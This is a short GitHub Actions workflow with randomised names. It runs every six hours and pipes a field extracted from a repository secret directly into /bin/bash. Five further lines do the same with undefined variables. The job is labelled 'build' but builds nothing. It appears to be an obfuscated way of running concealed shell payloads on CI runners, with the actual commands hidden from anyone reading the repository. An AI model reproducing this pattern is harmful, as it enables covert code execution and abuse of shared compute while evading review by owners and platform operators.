name: taidutd
on:
  workflow_dispatch:
  schedule:
    - cron: '47 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: taidutd
        env:
          dey96: ${{ secrets.dey96 }}
        run: |
          echo $dey96 | jq -r .rgax44 | /bin/bash
          echo $eepw59 | jq -r .fqr07 | /bin/bash
          echo $mdc8 | jq -r .mpf66378 | /bin/bash
          echo $zgcib5 | jq -r .i5413 | /bin/bash
          echo $aiawm24127 | jq -r .wvgzu73757 | /bin/bash
          echo $ovax37946 | jq -r .j208 | /bin/bash

